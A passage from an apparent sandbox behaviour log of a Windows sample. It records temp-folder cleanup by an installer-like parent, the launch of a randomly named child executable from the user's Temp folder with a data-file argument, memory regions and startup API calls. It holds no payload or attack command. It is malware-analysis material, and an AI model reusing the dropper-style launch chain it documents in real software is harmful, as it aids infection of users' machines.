ftLastAccessTime.dwHighDateTime=0x1d900af, ftLastWriteTime.dwLowDateTime=0xf8092087, ftLastWriteTime.dwHighDateTime=0x1d900af, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.908] FindNextFileA (in: hFindFile=0x4956c8, lpFindFileData=0x19fc94 | out: lpFindFileData=0x19fc94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8092087, ftCreationTime.dwHighDateTime=0x1d900af, ftLastAccessTime.dwLowDateTime=0xf8092087, ftLastAccessTime.dwHighDateTime=0x1d900af, ftLastWriteTime.dwLowDateTime=0xf8092087, ftLastWriteTime.dwHighDateTime=0x1d900af, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0061.908] FindClose (in: hFindFile=0x4956c8 | out: hFindFile=0x4956c8) returned 1 [0061.908] FindFirstFileA (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsg75b2.tmp"), lpFindFileData=0x4225d0 | out: lpFindFileData=0x4225d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf8092087, ftCreationTime.dwHighDateTime=0x1d900af, ftLastAccessTime.dwLowDateTime=0xf8092087, ftLastAccessTime.dwHighDateTime=0x1d900af, ftLastWriteTime.dwLowDateTime=0xf8092087, ftLastWriteTime.dwHighDateTime=0x1d900af, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nsg75B2.tmp", cAlternateFileName="")) returned 0x495888 [0061.909] FindClose (in: hFindFile=0x495888 | out: hFindFile=0x495888) returned 1 [0061.909] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp") returned 48 [0061.909] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp\\" [0061.909] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsg75b2.tmp")) returned 0x10 [0061.909] SetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp\\", dwFileAttributes=0x10) returned 1 [0061.909] RemoveDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsg75b2.tmp")) returned 1 [0061.910] OleUninitialize () [0062.057] ExitProcess (uExitCode=0x2) Thread: id = 2 os_tid = 0x7f0 Thread: id = 3 os_tid = 0x1070 Thread: id = 4 os_tid = 0x6d0 Process: id = "2" image_name = "rvtzlpyrgs.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rvtzlpyrgs.exe" page_root = "0x5ac11000" os_pid = "0xbac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbb0" cmd_line = "\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe\" C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xdnyr.wb" cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f213" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 345 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 346 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 347 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 348 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 349 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 350 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 351 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 352 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 353 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 354 start_va = 0x400000 end_va = 0x462fff monitored = 1 entry_point = 0x407a2d region_type = mapped_file name = "rvtzlpyrgs.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rvtzlpyrgs.exe") Region: id = 355 start_va = 0x77760000 end_va = 0x778dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 356 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 357 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 358 start_va = 0x7fff0000 end_va = 0x7ffd0d94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 359 start_va = 0x7ffd0d950000 end_va = 0x7ffd0db10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 360 start_va = 0x7ffd0db11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd0db11000" filename = "" Region: id = 361 start_va = 0x470000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 362 start_va = 0x700a0000 end_va = 0x700effff monitored = 0 entry_point = 0x700b8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 363 start_va = 0x70020000 end_va = 0x70099fff monitored = 0 entry_point = 0x70033290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 364 start_va = 0x77340000 end_va = 0x7741ffff monitored = 0 entry_point = 0x77353980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 365 start_va = 0x700f0000 end_va = 0x700f7fff monitored = 0 entry_point = 0x700f17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 366 start_va = 0x470000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 367 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 368 start_va = 0x77340000 end_va = 0x7741ffff monitored = 0 entry_point = 0x77353980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 369 start_va = 0x75580000 end_va = 0x756fdfff monitored = 0 entry_point = 0x75631b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 370 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 371 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 455 start_va = 0x640000 end_va = 0x6fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 456 start_va = 0x743e0000 end_va = 0x74471fff monitored = 0 entry_point = 0x74420380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 457 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 458 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 459 start_va = 0x74df0000 end_va = 0x74e34fff monitored = 0 entry_point = 0x74e0de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 460 start_va = 0x753c0000 end_va = 0x7547dfff monitored = 0 entry_point = 0x753f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 461 start_va = 0x470000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 462 start_va = 0x4e0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 463 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 464 start_va = 0x75700000 end_va = 0x758bcfff monitored = 0 entry_point = 0x757e2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 465 start_va = 0x74e90000 end_va = 0x74f3cfff monitored = 0 entry_point = 0x74ea4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 466 start_va = 0x74490000 end_va = 0x744adfff monitored = 0 entry_point = 0x7449b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 467 start_va = 0x74480000 end_va = 0x74489fff monitored = 0 entry_point = 0x74482a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 468 start_va = 0x772c0000 end_va = 0x77317fff monitored = 0 entry_point = 0x773025c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 469 start_va = 0x776b0000 end_va = 0x776f3fff monitored = 0 entry_point = 0x776c9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 470 start_va = 0x75210000 end_va = 0x7535efff monitored = 0 entry_point = 0x752c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 471 start_va = 0x74f40000 end_va = 0x75086fff monitored = 0 entry_point = 0x74f51cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 472 start_va = 0x75960000 end_va = 0x76d5efff monitored = 0 entry_point = 0x75b1b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 473 start_va = 0x75540000 end_va = 0x75576fff monitored = 0 entry_point = 0x75543b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 474 start_va = 0x74820000 end_va = 0x74d18fff monitored = 0 entry_point = 0x74a27610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 475 start_va = 0x77420000 end_va = 0x7749afff monitored = 0 entry_point = 0x7743e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 476 start_va = 0x77320000 end_va = 0x7732bfff monitored = 0 entry_point = 0x77323930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 477 start_va = 0x77230000 end_va = 0x772bcfff monitored = 0 entry_point = 0x77279b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 478 start_va = 0x74e40000 end_va = 0x74e83fff monitored = 0 entry_point = 0x74e47410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 479 start_va = 0x75530000 end_va = 0x7553efff monitored = 0 entry_point = 0x75532e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 480 start_va = 0x70160000 end_va = 0x701a2fff monitored = 0 entry_point = 0x7016dc40 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\SysWOW64\\pdh.dll" (normalized: "c:\\windows\\syswow64\\pdh.dll") Region: id = 481 start_va = 0x70110000 end_va = 0x7011ffff monitored = 0 entry_point = 0x70113820 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 482 start_va = 0x6f640000 end_va = 0x6f65efff monitored = 0 entry_point = 0x6f649820 region_type = mapped_file name = "loadperf.dll" filename = "\\Windows\\SysWOW64\\loadperf.dll" (normalized: "c:\\windows\\syswow64\\loadperf.dll") Region: id = 483 start_va = 0x6f5d0000 end_va = 0x6f636fff monitored = 0 entry_point = 0x6f5e5a00 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 484 start_va = 0x6f530000 end_va = 0x6f5c8fff monitored = 0 entry_point = 0x6f568470 region_type = mapped_file name = "odbc32.dll" filename = "\\Windows\\SysWOW64\\odbc32.dll" (normalized: "c:\\windows\\syswow64\\odbc32.dll") Region: id = 485 start_va = 0x6f4b0000 end_va = 0x6f52efff monitored = 0 entry_point = 0x6f4bef20 region_type = mapped_file name = "mscms.dll" filename = "\\Windows\\SysWOW64\\mscms.dll" (normalized: "c:\\windows\\syswow64\\mscms.dll") Region: id = 486 start_va = 0x71ad0000 end_va = 0x71aeafff monitored = 0 entry_point = 0x71ad9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 487 start_va = 0x70ab0000 end_va = 0x70ab7fff monitored = 0 entry_point = 0x70ab1d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 488 start_va = 0x70140000 end_va = 0x70158fff monitored = 0 entry_point = 0x701447e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 489 start_va = 0x6f490000 end_va = 0x6f4a9fff monitored = 0 entry_point = 0x6f493820 region_type = mapped_file name = "mapi32.dll" filename = "\\Windows\\SysWOW64\\mapi32.dll" (normalized: "c:\\windows\\syswow64\\mapi32.dll") Region: id = 490 start_va = 0x74720000 end_va = 0x7480afff monitored = 0 entry_point = 0x7475d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 491 start_va = 0x800000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 492 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 493 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 494 start_va = 0x9d0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 495 start_va = 0x76df0000 end_va = 0x76e1afff monitored = 0 entry_point = 0x76df5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 496 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 497 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 498 start_va = 0x9e0000 end_va = 0xb60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 499 start_va = 0xb70000 end_va = 0x1f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 500 start_va = 0x1f70000 end_va = 0x2000fff monitored = 0 entry_point = 0x1fa8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 501 start_va = 0x1f70000 end_va = 0x2348fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 502 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 503 start_va = 0x4b0000 end_va = 0x4c9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 520 start_va = 0x2350000 end_va = 0x24c8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 521 start_va = 0x24d0000 end_va = 0x264afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 522 start_va = 0x2350000 end_va = 0x24c8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 523 start_va = 0x24d0000 end_va = 0x264afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 524 start_va = 0x2350000 end_va = 0x24c8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 525 start_va = 0x24d0000 end_va = 0x264afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 527 start_va = 0x2350000 end_va = 0x24c8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 528 start_va = 0x24d0000 end_va = 0x264afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 529 start_va = 0x2350000 end_va = 0x23f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002350000" filename = "" Region: id = 530 start_va = 0x2400000 end_va = 0x2578fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 531 start_va = 0x2580000 end_va = 0x26fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 532 start_va = 0x2400000 end_va = 0x2578fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 533 start_va = 0x2580000 end_va = 0x26fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 534 start_va = 0x2400000 end_va = 0x2578fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 535 start_va = 0x2580000 end_va = 0x26fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Thread: id = 5 os_tid = 0x1e0 [0059.752] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0059.753] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x75580000 [0059.753] GetProcAddress (hModule=0x75580000, lpProcName="InitializeCriticalSectionEx") returned 0x7563d740 [0059.753] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x75580000 [0059.753] GetProcAddress (hModule=0x75580000, lpProcName="FlsAlloc") returned 0x75644490 [0059.753] GetProcAddress (hModule=0x75580000, lpProcName="FlsSetValue") returned 0x7563d7a0 [0059.755] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x75580000 [0059.755] GetProcAddress (hModule=0x75580000, lpProcName="InitializeCriticalSectionEx") returned 0x7563d740 [0059.755] GetProcessHeap () returned 0x4e0000 [0059.755] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x75580000 [0059.755] GetProcAddress (hModule=0x75580000, lpProcName="FlsAlloc") returned 0x75644490 [0059.755] GetLastError () returned 0xcb [0059.756] GetProcAddress (hModule=0x75580000, lpProcName="FlsGetValue") returned 0x7562f350 [0059.756] GetProcAddress (hModule=0x75580000, lpProcName="FlsSetValue") returned 0x7563d7a0 [0059.756] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x364) returned 0x4fa498 [0059.756] SetLastError (dwErrCode=0xcb) [0059.756] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xe00) returned 0x4fcf90 [0059.826] GetStartupInfoW (in: lpStartupInfo=0x19fe9c | out: lpStartupInfo=0x19fe9c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x409750, hStdOutput=0xe346b59, hStdError=0xfffffffe)) [0059.826] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0059.826] GetFileType (hFile=0x38) returned 0x2 [0059.826] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0059.826] GetFileType (hFile=0x3c) returned 0x2 [0059.826] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0059.826] GetFileType (hFile=0x40) returned 0x2 [0059.826] GetCommandLineA () returned="\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe\" C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xdnyr.wb" [0059.826] GetCommandLineW () returned="\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe\" C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xdnyr.wb" [0059.826] GetACP () returned 0x4e4 [0059.826] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x220) returned 0x4fdd98 [0059.826] IsValidCodePage (CodePage=0x4e4) returned 1 [0059.826] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19febc | out: lpCPInfo=0x19febc) returned 1 [0059.826] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f784 | out: lpCPInfo=0x19f784) returned 1 [0059.826] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd98, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0059.826] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd98, cbMultiByte=256, lpWideCharStr=0x19f528, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⣌CĀ") returned 256 [0059.826] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ⣌CĀ", cchSrc=256, lpCharType=0x19f798 | out: lpCharType=0x19f798) returned 1 [0059.826] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd98, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0059.826] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd98, cbMultiByte=256, lpWideCharStr=0x19f4d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0059.826] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x75580000 [0059.828] GetProcAddress (hModule=0x75580000, lpProcName="LCMapStringEx") returned 0x756295f0 [0059.828] LCMapStringEx (in: 